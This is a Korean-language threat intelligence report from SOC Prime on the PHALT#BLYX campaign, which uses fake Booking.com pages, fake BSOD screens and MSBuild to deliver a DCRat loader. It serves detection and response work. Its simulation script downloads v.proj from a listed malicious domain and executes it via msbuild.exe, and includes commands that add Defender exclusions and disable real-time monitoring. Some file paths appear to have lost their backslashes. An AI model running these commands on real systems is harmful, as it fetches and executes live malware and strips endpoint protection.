SOC Prime Bias: 중간

06 Jan 2026 16:06 UTC

PHALT#BLYX 분석: 가짜 BSOD 및 신뢰할 수 있는 빌드 도구를 활용한 멀웨어 체인

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon 팔로우
PHALT#BLYX 분석: 가짜 BSOD 및 신뢰할 수 있는 빌드 도구를 활용한 멀웨어 체인
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

이 보고서는 가짜 Booking.com 랜딩 페이지, 잘못된 블루 스크린 스타일 애니메이션, 그리고 사용자가 PowerShell 드로퍼를 실행하도록 유도하는 ClickFix 스타일 프롬프트를 결합한 다단계 침입 체인이 환대 부문에 미치는 영향을 상세히 설명합니다. 이 드로퍼는 MSBuild 프로젝트 파일을 검색하여 맞춤형 DCRat 로더를 실행합니다. 로더는 Windows Defender를 조작하고, 시작 .url 단축키를 사용하여 지속성을 설정하며, 합법적인 프로세스에 페이로드를 주입합니다. PowerShell과 MSBuild.exe와 같은 living-off-the-land 유틸리티를 사용하여 운영자들은 명백한 악성코드 흔적을 줄입니다. 이 체인에 러시아어 언어 아티팩트가 존재한다는 점도 속성 단서로 언급됩니다.

조사

Securonix 연구원들은 ‘예약 취소’ 링크를 포함한 피싱 이메일에서 악성 도메인으로 이어진 흐름을 매핑한 후, msbuild.exe를 찾아 v.proj 파일을 다운로드하고 실행하는 PowerShell 원라이너로 연결했습니다. v.proj 프로젝트는 여러 액션을 수행합니다: Windows Defender 예외를 추가하고, staxs.exe(DCRat 변형)를 다운로드하고, 시작 .url 단축키를 생성하여 지속성을 유지하며, 포트 3535를 통해 명령 및 제어 인프라에 연결합니다. 로더는 마지막 단계를 aspnet_compiler.exe에 압축하고 주입하여 합법적 활동에 녹아듭니다.

완화

사용자에게 ClickFix 스타일 프롬프트와 ‘이 명령을 실행하여 수정’하는 사회공학을 인식하도록 교육하여 노출을 줄입니다. 특히 비정상적인 경로나 사용자 주도의 워크플로에서 호출될 때 MSBuild.exe 실행을 모니터링 및 제한하고, PowerShell 스크립트 블록 로깅을 활성화하여 가시성을 개선합니다. 시작 폴더의 .url 단축키 생성 및 Windows Defender 예외 수정에 대한 탐지를 추가합니다. 네트워크 계층에서는 식별된 악성 도메인으로의 아웃바운드 트래픽을 차단하고 TCP/3535로의 수상한 송출을 명시적으로 제한하거나 경고하세요.

대응

활동이 감지되면 호스트를 격리하고 v.proj, staxs.exe 및 모든 시작 .url 파일을 포함한 주요 아티팩트를 보존합니다. 승인되지 않은 Defender 예외를 제거하고, 악성 프로세스나 주입된 프로세스를 종료하며, 관련 C2 도메인/IP를 차단합니다 – 특히 포트 3535을 통한 모든 통신을 차단합니다. 잠재적으로 노출된 자격 증명을 재설정하고, 전체 악성코드 스캔을 수행하며, 유사한 MSBuild 기반 실행 및 PowerShell 명령 패턴을 환경 전반적으로 조사합니다. 마지막으로, Startup 단축키를 통한 지속성, ClickFix 동작 및 MSBuild 오용에 초점을 맞춘 위협 인텔리전스 기반 탐지를 배포하여 재발을 방지합니다.

공격 흐름

탐지

PowerShell을 통한 다운로드 또는 업로드 (cmdline 이용)

SOC Prime 팀
2026년 1월 6일

Windows Defender 환경설정 수상한 변경 (PowerShell 이용)

SOC Prime 팀
2026년 1월 6일

가능한 지속성 포인트 [ASEPs – Software/NTUSER Hive] (registry_event 이용)

SOC Prime 팀
2026년 1월 6일

자동 시작 위치에서 수상한 바이너리/스크립트 (file_event 이용)

SOC Prime 팀
2026년 1월 6일

PHALT#BLYX 분석을 위한 IOCs (HashSha512) 감지: 가짜 BSOD와 신뢰할 수 있는 빌드 도구가 어떻게 악성코드 감염을 구성하는지

SOC Prime AI 규칙
2026년 1월 6일

PHALT#BLYX 분석을 위한 IOCs (SourceIP) 감지: 가짜 BSOD와 신뢰할 수 있는 빌드 도구가 어떻게 악성코드 감염을 구성하는지

SOC Prime AI 규칙
2026년 1월 6일

PHALT#BLYX 분석을 위한 IOCs (HashSha256) 감지: 가짜 BSOD와 신뢰할 수 있는 빌드 도구가 어떻게 악성코드 감염을 구성하는지

SOC Prime AI 규칙
2026년 1월 6일

PHALT#BLYX 분석을 위한 IOCs (DestinationIP) 감지: 가짜 BSOD와 신뢰할 수 있는 빌드 도구가 어떻게 악성코드 감염을 구성하는지

SOC Prime AI 규칙
2026년 1월 6일

PHALT#BLYX 악성 페이로드 실행 (Windows 프로세스 생성) – MSBuild 및 프로세스 할로잉 사용

SOC Prime AI 규칙
2026년 1월 6일

PHALT#BLYX 악성 캠페인 (Windows PowerShell) – 감염을 위해 PowerShell 및 MSBuild 사용

SOC Prime AI 규칙
2026년 1월 6일

시뮬레이션 실행

전제 조건: 텔레메트리 및 베이스라인 사전 점검이 통과해야 합니다.

이유: 이 섹션은 탐지 규칙을 트리거하도록 설계된 적 공격자 기술(TTP) 실행을 명확히 설명합니다. 명령과 설명은 식별된 TTP를 직접 반영하고 탐지 논리에 기대되는 정확한 텔레메트리를 생성하는 데 목표를 둡니다.

  • 공격 서사 및 명령:
    위협 행위자는 손상된 엔드포인트에서 PowerShell 세션을 엽니다. 그들은 먼저 시스템의 msbuild.exe 바이너리를 찾은 다음 악성 MSBuild 프로젝트 (v.proj)을 C:ProgramData에 다운로드합니다. 공격자는 즉시 msbuild.exe 을 호출하여 페이로드를 실행하고 두 번째 단계를 떨어뜨립니다. 마지막으로, 지속성을 보장하기 위해 Windows Defender의 설정을 조작하여 예외를 추가하고 실시간 모니터링을 비활성화합니다.

  • 회귀 테스트 스크립트:

    # PHALT#BLYX 시뮬레이션 스크립트 - 탐지 트리거 활동을 재현합니다
    # --------------------------------------------------------------
    # 1. msbuild.exe 찾기
    $msb = (Get-ChildItem -Path C: -Filter msbuild.exe -Recurse -ErrorAction SilentlyContinue | Select-Object -First 1).FullName
    
    # 2. ProgramData에 악성 MSBuild 프로젝트 다운로드
    $projUrl = "https://2fa-bns.com/v.proj"
    $dest    = "$env:ProgramDatav.proj"
    Invoke-WebRequest -Uri $projUrl -OutFile $dest
    
    # 3. msbuild.exe로 프로젝트 실행
    & $msb $dest
    
    # 4. Windows Defender 설정 수정 (다음 중 하나를 선택하면 규칙이 충족됩니다)
    #    공격자의 행동을 시뮬레이션하려면 원하는 줄의 주석을 해제하세요.
    
    # 제외 경로 추가
    # Add-MpPreference -ExclusionPath "$env:ProgramData"
    
    # .exe 파일 제외 추가
    # Add-MpPreference -ExclusionExtension ".exe"
    
    # .ps1 파일 제외 추가
    # Add-MpPreference -ExclusionExtension ".ps1"
    
    # 실시간 모니터링 비활성화
    # Set-MpPreference -DisableRealtimeMonitoring $true
  • 정리 명령:

    # 드롭된 프로젝트 파일 제거
    Remove-Item -Path "$env:ProgramDatav.proj" -Force -ErrorAction SilentlyContinue
    
    # Windows Defender 실시간 모니터링 복원 (비활성화된 경우)
    Set-MpPreference -DisableRealtimeMonitoring $false
    
    # 추가한 제외 제거 (경로 제외 예시)
    Remove-MpPreference -ExclusionPath "$env:ProgramData"
    
    # 페이로드에 의해 생성된 남아있는 파일을 선택적으로 삭제
    # Remove-Item -Path "C:ProgramDatamalicious_payload.exe" -Force -ErrorAction SilentlyContinue